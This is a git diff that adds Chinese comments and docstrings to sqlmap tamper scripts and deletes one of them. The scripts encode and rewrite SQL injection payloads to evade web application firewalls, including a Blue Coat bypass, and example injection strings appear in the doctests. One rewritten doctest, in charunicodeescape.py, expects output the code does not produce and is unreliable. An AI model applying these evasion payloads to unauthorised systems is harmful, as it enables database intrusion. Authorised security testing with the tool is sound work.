diff --git a/src/sqlmap-master/tamper/0eunion.py b/src/sqlmap-master/tamper/0eunion.py index 9342053..aee154a 100644 --- a/src/sqlmap-master/tamper/0eunion.py +++ b/src/sqlmap-master/tamper/0eunion.py @@ -9,24 +9,35 @@ import re from lib.core.enums import PRIORITY -__priority__ = PRIORITY.HIGHEST +__priority__ = PRIORITY.HIGHEST # 设置优先级为最高 def dependencies(): pass def tamper(payload, **kwargs): """ - Replaces instances of UNION with e0UNION - - Requirement: - * MySQL - * MsSQL - - Notes: - * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf - - >>> tamper('1 UNION ALL SELECT') - '1e0UNION ALL SELECT' + 这个函数用于篡改(tamper)输入的payload,以绕过某些安全防护措施。 + + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 + + 功能: + 将payload中的 UNION替换为e0UNION,以尝试绕过安全防护。 + + 要求: + * 适用于MySQL和MsSQL数据库。 + + 注意: + * 参考文档:https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf + * 该函数假设输入的payload是有效的,并且不进行任何错误处理。 + + 示例: + >>> tamper('1 UNION ALL SELECT') + '1e0UNION ALL SELECT' """ + + # 使用正则表达式替换payload中的数字和UNION之间的空格为'e0' + # \g<1>表示匹配的第一个括号中的内容,\g<2>表示第二个括号中的内容 return re.sub(r"(?i)(\d+)\s+(UNION )", r"\g<1>e0\g<2>", payload) if payload else payload diff --git a/src/sqlmap-master/tamper/apostrophemask.py b/src/sqlmap-master/tamper/apostrophemask.py index 113b5bf..0eaf56e 100644 --- a/src/sqlmap-master/tamper/apostrophemask.py +++ b/src/sqlmap-master/tamper/apostrophemask.py @@ -7,23 +7,31 @@ See the file 'LICENSE' for copying permission from lib.core.enums import PRIORITY -__priority__ = PRIORITY.LOWEST +__priority__ = PRIORITY.LOWEST# 设置优先级为最低 def dependencies(): pass def tamper(payload, **kwargs): """ - Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87) + 这个函数用于篡改(tamper)输入的payload,将其中的单引号字符(')替换为其UTF-8全角字符对应物。 - References: + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 + + 功能: + 将payload中的单引号(')替换为UTF-8编码的全角单引号(%EF%BC%87),用于绕过某些安全防护措施。 + + 参考链接: * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 * https://web.archive.org/web/20130614183121/http://lukasz.pilorz.net/testy/unicode_conversion/ * https://web.archive.org/web/20131121094431/sla.ckers.org/forum/read.php?13,11562,11850 * https://web.archive.org/web/20070624194958/http://lukasz.pilorz.net/testy/full_width_utf/index.phps - >>> tamper("1 AND '1'='1") - '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' + 示例: + >>> tamper("1 AND '1'='1") + '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' """ - + # 替换payload中的单引号为UTF-8全角单引号 return payload.replace('\'', "%EF%BC%87") if payload else payload diff --git a/src/sqlmap-master/tamper/apostrophenullencode.py b/src/sqlmap-master/tamper/apostrophenullencode.py index 7a3cd18..d850c00 100644 --- a/src/sqlmap-master/tamper/apostrophenullencode.py +++ b/src/sqlmap-master/tamper/apostrophenullencode.py @@ -7,17 +7,29 @@ See the file 'LICENSE' for copying permission from lib.core.enums import PRIORITY -__priority__ = PRIORITY.LOWEST +__priority__ = PRIORITY.LOWEST# 设置优先级为最低 def dependencies(): + """ + 这个函数用于定义依赖关系,但在当前脚本中未实现任何功能。 + 通常,这个函数用于检查当前函数所需的依赖是否满足。 + """ pass def tamper(payload, **kwargs): """ - Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27) + 这个函数用于篡改(tamper)输入的payload,将其中的单引号字符(')替换为其非法的双Unicode编码对应物。 + + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 + + 功能: + 将payload中的单引号(')替换为%00%27,这是一种非法的Unicode编码方式,用于绕过某些安全防护措施。 - >>> tamper("1 AND '1'='1") - '1 AND %00%271%00%27=%00%271' + 示例: + >>> tamper("1 AND '1'='1") + '1 AND %00%271%00%27=%00%271' """ - return payload.replace('\'', "%00%27") if payload else payload + return payload.replace('\'', "%00%27") if payload else payload # 替换payload中的单引号为%00%27 diff --git a/src/sqlmap-master/tamper/appendnullbyte.py b/src/sqlmap-master/tamper/appendnullbyte.py index 5fda08b..2493e70 100644 --- a/src/sqlmap-master/tamper/appendnullbyte.py +++ b/src/sqlmap-master/tamper/appendnullbyte.py @@ -15,23 +15,30 @@ __priority__ = PRIORITY.LOWEST def dependencies(): singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.ACCESS)) - + # 显示警告信息,指出该tamper脚本仅适用于Microsoft Access数据库 def tamper(payload, **kwargs): """ - Appends (Access) NULL byte character (%00) at the end of payload + 这个函数用于篡改(tamper)输入的payload,通过在末尾添加一个NULL字节(%00)。 + + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 + + 功能: + 在payload的末尾添加一个NULL字节(%00),这在对付某些弱Web应用防火墙时非常有用,特别是当后端数据库管理系统是Microsoft Access时。 - Requirement: - * Microsoft Access + 要求: + * 仅适用于Microsoft Access数据库。 - Notes: - * Useful to bypass weak web application firewalls when the back-end - database management system is Microsoft Access - further uses are - also possible + 注意: + * 这种技术除了可以绕过Web应用防火墙外,还有其他可能的用途。 - Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection + 参考链接: + * http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection - >>> tamper('1 AND 1=1') - '1 AND 1=1%00' + 示例: + >>> tamper('1 AND 1=1') + '1 AND 1=1%00' """ - return "%s%%00" % payload if payload else payload + return "%s%%00" % payload if payload else payload # 如果payload不为空,则在其末尾添加NULL字节(%00) diff --git a/src/sqlmap-master/tamper/base64encode.py b/src/sqlmap-master/tamper/base64encode.py index 9e81dc9..ff35fd2 100644 --- a/src/sqlmap-master/tamper/base64encode.py +++ b/src/sqlmap-master/tamper/base64encode.py @@ -5,20 +5,28 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -from lib.core.convert import encodeBase64 -from lib.core.enums import PRIORITY +from lib.core.convert import encodeBase64 # 导入Base64编码函数 +from lib.core.enums import PRIORITY # 导入优先级枚举 -__priority__ = PRIORITY.LOW +__priority__ = PRIORITY.LOW # 设置优先级为低 def dependencies(): pass def tamper(payload, **kwargs): - """ - Base64-encodes all characters in a given payload + """ + 这个函数用于篡改(tamper)输入的payload,将所有字符进行Base64编码。 + + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 + + 功能: + 对输入的payload进行Base64编码,这可以用于绕过某些对特殊字符有限制的安全防护措施。 - >>> tamper("1' AND SLEEP(5)#") - 'MScgQU5EIFNMRUVQKDUpIw==' + 示例: + >>> tamper("1' AND SLEEP(5)#") + 'MScgQU5EIFNMRUVQKDUpIw==' """ - return encodeBase64(payload, binary=False) if payload else payload + return encodeBase64(payload, binary=False) if payload else payload # 如果payload不为空,则对其进行Base64编码,binary=False表示结果为ASCII字符串 diff --git a/src/sqlmap-master/tamper/between.py b/src/sqlmap-master/tamper/between.py index d07e224..41fd980 100644 --- a/src/sqlmap-master/tamper/between.py +++ b/src/sqlmap-master/tamper/between.py @@ -16,44 +16,46 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #' + 这个函数用于篡改(tamper)输入的payload,将大于操作符('>)替换为'NOT BETWEEN 0 AND #',将等于操作符('=')替换为'BETWEEN # AND #'。 - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 + 测试情况: + * 微软 SQL Server 2005 + * MySQL 4, 5.0 和 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the greater than character - * The BETWEEN clause is SQL standard. Hence, this tamper script - should work against all (?) databases - - >>> tamper('1 AND A > B--') - '1 AND A NOT BETWEEN 0 AND B--' - >>> tamper('1 AND A = B--') - '1 AND A BETWEEN B AND B--' - >>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()') - '1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()' + 注意: + * 这个替换很有用,可以绕过那些只过滤大于字符的弱Web应用防火墙。 + * BETWEEN子句是SQL标准。因此,这个tamper脚本应该适用于所有数据库。 + + 示例: + >>> tamper('1 AND A > B--') + '1 AND A NOT BETWEEN 0 AND B--' + >>> tamper('1 AND A = B--') + '1 AND A BETWEEN B AND B--' + >>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()') + '1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()' """ - retVal = payload - if payload: + retVal = payload # 初始化返回值 + + if payload:# 如果payload不为空 + # 使用正则表达式查找并替换大于操作符('>) match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload) - if match: + if match: # 如果找到匹配项 _ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5)) - retVal = retVal.replace(match.group(0), _) + retVal = retVal.replace(match.group(0), _) # 替换匹配项 else: - retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload) + retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload) # 替换大于操作符 - if retVal == payload: + if retVal == payload: # 如果返回值未改变,尝试替换等于操作符('=) match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*([\w()]+)\s*", payload) - if match: + if match:# 如果找到匹配项 _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5)) - retVal = retVal.replace(match.group(0), _) + retVal = retVal.replace(match.group(0), _)# 替换匹配项 + - return retVal + return retVal# 返回篡改后的payload diff --git a/src/sqlmap-master/tamper/binary.py b/src/sqlmap-master/tamper/binary.py index b0151a3..023047f 100644 --- a/src/sqlmap-master/tamper/binary.py +++ b/src/sqlmap-master/tamper/binary.py @@ -16,28 +16,29 @@ def dependencies(): def tamper(payload, **kwargs): """ - Injects keyword binary where possible - - Requirement: - * MySQL - - >>> tamper('1 UNION ALL SELECT NULL, NULL, NULL') - '1 UNION ALL SELECT binary NULL, binary NULL, binary NULL' - >>> tamper('1 AND 2>1') - '1 AND binary 2>binary 1' - >>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END') - 'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END' + 这个函数用于篡改(tamper)输入的payload,注入MySQL中的关键字'binary',以尝试绕过某些安全防护措施。 + + 要求: + * 仅适用于MySQL数据库。 + + 示例: + >>> tamper('1 UNION ALL SELECT NULL, NULL, NULL') + '1 UNION ALL SELECT binary NULL, binary NULL, binary NULL' + >>> tamper('1 AND 2>1') + '1 AND binary 2>binary 1' + >>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END') + 'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END' """ - retVal = payload + retVal = payload # 初始化返回值 - if payload: - retVal = re.sub(r"\bNULL\b", "binary NULL", retVal) - retVal = re.sub(r"\b(THEN\s+)(\d+|0x[0-9a-f]+)(\s+ELSE\s+)(\d+|0x[0-9a-f]+)", r"\g<1>binary \g<2>\g<3>binary \g<4>", retVal) - retVal = re.sub(r"(\d+\s*[>=]\s*)(\d+)", r"binary \g<1>binary \g<2>", retVal) - retVal = re.sub(r"\b((AND|OR)\s*)(\d+)", r"\g<1>binary \g<3>", retVal) - retVal = re.sub(r"([>=]\s*)(\d+)", r"\g<1>binary \g<2>", retVal) - retVal = re.sub(r"\b(0x[0-9a-f]+)", r"binary \g<1>", retVal) - retVal = re.sub(r"(\s+binary)+", r"\g<1>", retVal) + if payload: # 如果payload不为空 + retVal = re.sub(r"\bNULL\b", "binary NULL", retVal) # 替换NULL为binary NULL + retVal = re.sub(r"\b(THEN\s+)(\d+|0x[0-9a-f]+)(\s+ELSE\s+)(\d+|0x[0-9a-f]+)", r"\g<1>binary \g<2>\g<3>binary \g<4>", retVal)# 在THEN和ELSE后的数字或十六进制值前添加binary关键字 + retVal = re.sub(r"(\d+\s*[>=]\s*)(\d+)", r"binary \g<1>binary \g<2>", retVal)# 在数字比较操作中添加binary关键字 + retVal = re.sub(r"\b((AND|OR)\s*)(\d+)", r"\g<1>binary \g<3>", retVal)# 在AND或OR条件后的数字前添加binary关键字 + retVal = re.sub(r"([>=]\s*)(\d+)", r"\g<1>binary \g<2>", retVal)# 在比较操作符前的数字前添加binary关键字 + retVal = re.sub(r"\b(0x[0-9a-f]+)", r"binary \g<1>", retVal) # 在十六进制值前添加binary关键字 + retVal = re.sub(r"(\s+binary)+", r"\g<1>", retVal) # 移除多余的binary关键字 - return retVal + return retVal # 返回篡改后的payload diff --git a/src/sqlmap-master/tamper/bluecoat.py b/src/sqlmap-master/tamper/bluecoat.py index 7438d30..46e34e5 100644 --- a/src/sqlmap-master/tamper/bluecoat.py +++ b/src/sqlmap-master/tamper/bluecoat.py @@ -5,11 +5,12 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import re +import re# 导入正则表达式模块 -from lib.core.data import kb -from lib.core.enums import PRIORITY +from lib.core.data import kb # 导入知识库(包含SQL关键字等信息) +from lib.core.enums import PRIORITY # 导入优先级枚举 +# 设置优先级为普通 __priority__ = PRIORITY.NORMAL def dependencies(): @@ -17,34 +18,45 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE + 这个函数用于篡改(tamper)输入的payload,通过替换空格字符和等号来绕过Blue Coat SGOS的WAF。 - Requirement: - * Blue Coat SGOS with WAF activated as documented in - https://kb.bluecoat.com/index?page=content&id=FAQ2147 + 功能: + * 将SQL语句后的空格替换为有效的随机空白字符。 + * 将等号(=)替换为LIKE操作符。 - Tested against: + 要求: + * Blue Coat SGOS,且WAF已激活,参考文档:https://kb.bluecoat.com/index?page=content&id=FAQ2147 + + 测试情况: * MySQL 5.1, SGOS - Notes: - * Useful to bypass Blue Coat's recommended WAF rule configuration + 注意: + * 这个篡改方法对于绕过Blue Coat推荐的WAF规则配置很有用。 - >>> tamper('SELECT id FROM users WHERE id = 1') - 'SELECT%09id FROM%09users WHERE%09id LIKE 1' + 示例: + >>> tamper('SELECT id FROM users WHERE id = 1') + 'SELECT%09id FROM%09users WHERE%09id LIKE 1' """ def process(match): + """ + 辅助函数,用于处理正则匹配的结果。 + 将匹配到的SQL关键字替换为带有%09(制表符)的版本。 + """ word = match.group('word') if word.upper() in kb.keywords: return match.group().replace(word, "%s%%09" % word) else: return match.group() - retVal = payload + retVal = payload # 初始化返回值 if payload: + # 替换SQL关键字后跟非单词字符或字符串末尾的空格 retVal = re.sub(r"\b(?P[A-Z_]+)(?=[^\w(]|\Z)", process, retVal) + # 将等号替换为LIKE操作符 retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) + # 移除多余的%09空格 retVal = retVal.replace("%09 ", "%09") return retVal diff --git a/src/sqlmap-master/tamper/chardoubleencode.py b/src/sqlmap-master/tamper/chardoubleencode.py deleted file mode 100644 index ea711b4..0000000 --- a/src/sqlmap-master/tamper/chardoubleencode.py +++ /dev/null @@ -1,42 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) -See the file 'LICENSE' for copying permission -""" - -import string - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554) - - Notes: - * Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset - - >>> tamper('SELECT FIELD FROM%20TABLE') - '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' - """ - - retVal = payload - - if payload: - retVal = "" - i = 0 - - while i < len(payload): - if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: - retVal += '%%25%s' % payload[i + 1:i + 3] - i += 3 - else: - retVal += '%%25%.2X' % ord(payload[i]) - i += 1 - - return retVal diff --git a/src/sqlmap-master/tamper/charencode.py b/src/sqlmap-master/tamper/charencode.py index 181f978..6806af2 100644 --- a/src/sqlmap-master/tamper/charencode.py +++ b/src/sqlmap-master/tamper/charencode.py @@ -5,45 +5,54 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import string +import string # 导入字符串常量库,用于处理字符和十六进制数字 -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 -__priority__ = PRIORITY.LOWEST +__priority__ = PRIORITY.LOWEST# 设置优先级为最低 def dependencies(): pass def tamper(payload, **kwargs): """ - URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) + 这个函数用于篡改(tamper)输入的payload,通过URL编码所有字符(不处理已经编码的字符)。 - Tested against: + 功能: + * 将输入的SQL语句中的所有字符进行URL编码。 + * 例如,将'SELECT'转换为'%53%45%4C%45%43%54'。 + + 测试情况: * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 + * MySQL 4, 5.0 和 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 - Notes: - * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset - * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS + 注意: + * 这个方法对于绕过一些非常弱的Web应用防火墙很有用,这些防火墙在处理请求时不进行URL解码。 + * Web服务器会传递解码后的版本,因此应该适用于任何数据库管理系统(DBMS)。 - >>> tamper('SELECT FIELD FROM%20TABLE') - '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' + 示例: + >>> tamper('SELECT FIELD FROM%20TABLE') + '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' """ - retVal = payload - if payload: - retVal = "" - i = 0 + retVal = payload # 初始化返回值为输入的payload + if payload: # 如果payload不为空 + retVal = "" # 初始化返回值字符串 + i = 0 # 初始化索引 + # 遍历payload中的每个字符 while i < len(payload): + # 检查当前字符是否为%且后面两个字符是十六进制数字(已编码的字符) if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: - retVal += payload[i:i + 3] - i += 3 + retVal += payload[i:i + 3] # 如果是已编码的字符,直接添加到返回值 + i += 3 # 移动索引,跳过已处理的三个字符 else: - retVal += '%%%.2X' % ord(payload[i]) - i += 1 + # 对未编码的字符进行URL编码,并添加到返回值 + retVal += '%%%.2X' % ord(payload[i])# 将字符转换为其ASCII值的十六进制表示 + i += 1 # 移动索引,处理下一个字符 + - return retVal + return retVal # 返回篡改后的payload diff --git a/src/sqlmap-master/tamper/charunicodeencode.py b/src/sqlmap-master/tamper/charunicodeencode.py index 6e8b429..c8f72ce 100644 --- a/src/sqlmap-master/tamper/charunicodeencode.py +++ b/src/sqlmap-master/tamper/charunicodeencode.py @@ -8,46 +8,62 @@ See the file 'LICENSE' for copying permission import os import string -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import PRIORITY +from lib.core.common import singleTimeWarnMessage # 从核心库导入单次警告消息函数 +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 -__priority__ = PRIORITY.LOWEST +__priority__ = PRIORITY.LOWEST # 设置优先级为最低 def dependencies(): + """ + 这个函数用于在运行时检查依赖关系,并给出警告信息。 + + 功能: + - 显示一条单次警告消息,指出当前的tamper脚本仅适用于ASP或ASP.NET Web应用程序。 + """ singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP or ASP.NET web applications" % os.path.basename(__file__).split(".")[0]) def tamper(payload, **kwargs): """ - Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) + 这个函数用于篡改(tamper)输入的payload,通过Unicode-URL编码所有字符(不处理已经编码的字符)。 + + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 + + 功能: + - 将输入的payload中的字符转换为Unicode-URL编码格式(例如,'SELECT'转换为'%u0053%u0045%u004C%u0045%u0043%u0054')。 - Requirement: - * ASP - * ASP.NET + 要求: + * 仅适用于ASP和ASP.NET环境。 - Tested against: + 测试情况: * Microsoft SQL Server 2000 * Microsoft SQL Server 2005 * MySQL 5.1.56 * PostgreSQL 9.0.3 - Notes: - * Useful to bypass weak web application firewalls that do not unicode URL-decode the request before processing it through their ruleset + 注意: + * 这个篡改方法对于绕过那些在处理请求前不进行Unicode URL解码的弱Web应用防火墙很有用。 - >>> tamper('SELECT FIELD%20FROM TABLE') - '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' + 示例: + >>> tamper('SELECT FIELD%20FROM TABLE') + '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' """ - retVal = payload + retVal = payload # 初始化返回值为输入的payload - if payload: - retVal = "" - i = 0 + if payload: # 如果payload不为空 + retVal = "" # 初始化返回值字符串 + i = 0 # 初始化索引 + # 遍历payload中的每个字符 while i < len(payload): + # 如果当前字符是%且后面两个字符是十六进制数字(已编码的字符),则进行Unicode-URL编码 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += "%%u00%s" % payload[i + 1:i + 3] i += 3 else: + # 对未编码的字符进行Unicode-URL编码,并添加到返回值 retVal += '%%u%.4X' % ord(payload[i]) i += 1 diff --git a/src/sqlmap-master/tamper/charunicodeescape.py b/src/sqlmap-master/tamper/charunicodeescape.py index 8fe05c0..41d47a6 100644 --- a/src/sqlmap-master/tamper/charunicodeescape.py +++ b/src/sqlmap-master/tamper/charunicodeescape.py @@ -5,35 +5,48 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import string +import string # 导入字符串常量库,用于处理字符和十六进制数字 -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 +# 设置优先级为普通 __priority__ = PRIORITY.NORMAL def tamper(payload, **kwargs): """ - Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) + 这个函数用于篡改(tamper)输入的payload,通过Unicode转义非编码字符(不处理已经编码的字符)。 - Notes: - * Useful to bypass weak filtering and/or WAFs in JSON contexes + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 - >>> tamper('SELECT FIELD FROM TABLE') - '\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045' + 功能: + - 将输入的payload中的字符转换为Unicode转义序列(例如,'SELECT'转换为'\u0053\u0045\u004C\u0045\u0043\u0054')。 + + 注意: + * 这个方法对于绕过在JSON上下文中的弱过滤和/或Web应用防火墙(WAFs)很有用。 + + 示例: + >>> tamper('SELECT FIELD FROM TABLE') + '\\u0053\\u0045\\u004C\\u0045\\u0043\\u0054 \\u0020\\u0046\\u0049\\u0045\\u004C\\u0044 \\u0046\\u0052\\u004F\\u004D \\u0054\\u0041\\u0042\\u004C\\u0045' """ - retVal = payload + retVal = payload # 初始化返回值为输入的payload + - if payload: - retVal = "" - i = 0 + if payload: # 如果payload不为空 + retVal = "" # 初始化返回值字符串 + i = 0 # 初始化索引 + # 遍历payload中的每个字符 while i < len(payload): + # 如果当前字符是%且后面两个字符是十六进制数字(已编码的字符),则进行Unicode转义 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += "\\u00%s" % payload[i + 1:i + 3] i += 3 else: + # 对未编码的字符进行Unicode转义,并添加到返回值 retVal += '\\u%.4X' % ord(payload[i]) - i += 1 + i += 1 # 移动索引,处理下一个字符 return retVal diff --git a/src/sqlmap-master/tamper/commalesslimit.py b/src/sqlmap-master/tamper/commalesslimit.py index 0561b2f..c5a5799 100644 --- a/src/sqlmap-master/tamper/commalesslimit.py +++ b/src/sqlmap-master/tamper/commalesslimit.py @@ -5,13 +5,14 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import os -import re +import os # 导入操作系统接口模块 +import re # 导入正则表达式模块 -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY +from lib.core.common import singleTimeWarnMessage # 从核心库导入单次警告消息函数 +from lib.core.enums import DBMS # 从核心库导入数据库管理系统枚举 +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 +# 设置优先级为高 __priority__ = PRIORITY.HIGH def dependencies(): @@ -19,22 +20,33 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart + 这个函数用于篡改(tamper)输入的payload,将MySQL中的'LIMIT M, N'语句替换为其等效的'LIMIT N OFFSET M'形式。 - Requirement: - * MySQL + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 - Tested against: - * MySQL 5.0 and 5.5 + 要求: + * 仅适用于MySQL数据库。 - >>> tamper('LIMIT 2, 3') - 'LIMIT 3 OFFSET 2' + 测试情况: + * MySQL 5.0 和 5.5 + + 注意: + * 这个篡改方法对于绕过某些针对'LIMIT M, N'形式的防御机制很有用。 + + 示例: + >>> tamper('LIMIT 2, 3') + 'LIMIT 3 OFFSET 2' """ - retVal = payload + retVal = payload # 初始化返回值为输入的payload + + # 使用正则表达式查找'LIMIT M, N'形式的语句 match = re.search(r"(?i)LIMIT\s*(\d+),\s*(\d+)", payload or "") - if match: + if match: # 如果找到匹配项 + # 替换为'LIMIT N OFFSET M'形式 retVal = retVal.replace(match.group(0), "LIMIT %s OFFSET %s" % (match.group(2), match.group(1))) - return retVal + return retVal # 返回篡改后的payload diff --git a/src/sqlmap-master/tamper/commalessmid.py b/src/sqlmap-master/tamper/commalessmid.py index b6f4e7f..d8c368b 100644 --- a/src/sqlmap-master/tamper/commalessmid.py +++ b/src/sqlmap-master/tamper/commalessmid.py @@ -19,26 +19,37 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart + 这个函数用于篡改(tamper)输入的payload,将MySQL中的'MID(A, B, C)'语句替换为其等效的'MID(A FROM B FOR C)'形式。 - Requirement: - * MySQL + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 - Tested against: - * MySQL 5.0 and 5.5 + 要求: + * 仅适用于MySQL数据库。 - >>> tamper('MID(VERSION(), 1, 1)') - 'MID(VERSION() FROM 1 FOR 1)' + 测试情况: + * MySQL 5.0 和 5.5 + + 注意: + * 使用这个tamper脚本时,你可能需要考虑使用'--no-cast'选项,以避免类型转换问题。 + + 示例: + >>> tamper('MID(VERSION(), 1, 1)') + 'MID(VERSION() FROM 1 FOR 1)' """ - retVal = payload + retVal = payload # 初始化返回值为输入的payload + # 构建警告信息,提示用户可能需要使用'--no-cast'选项 warnMsg = "you should consider usage of switch '--no-cast' along with " warnMsg += "tamper script '%s'" % os.path.basename(__file__).split(".")[0] singleTimeWarnMessage(warnMsg) + # 使用正则表达式查找'MID(A, B, C)'形式的语句 match = re.search(r"(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)", payload or "") - if match: + if match: # 如果找到匹配项 + # 替换为'MID(A FROM B FOR C)'形式 retVal = retVal.replace(match.group(0), "MID(%s FROM %s FOR %s)" % (match.group(1), match.group(2), match.group(3))) - return retVal + return retVal # 返回篡改后的payload diff --git a/src/sqlmap-master/tamper/commentbeforeparentheses.py b/src/sqlmap-master/tamper/commentbeforeparentheses.py index d5e471d..b4d4162 100644 --- a/src/sqlmap-master/tamper/commentbeforeparentheses.py +++ b/src/sqlmap-master/tamper/commentbeforeparentheses.py @@ -5,11 +5,11 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import re +import re # 导入正则表达式模块 from lib.core.enums import PRIORITY -__priority__ = PRIORITY.NORMAL +__priority__ = PRIORITY.NORMAL # 设置优先级为普通 def dependencies(): pass @@ -32,9 +32,10 @@ def tamper(payload, 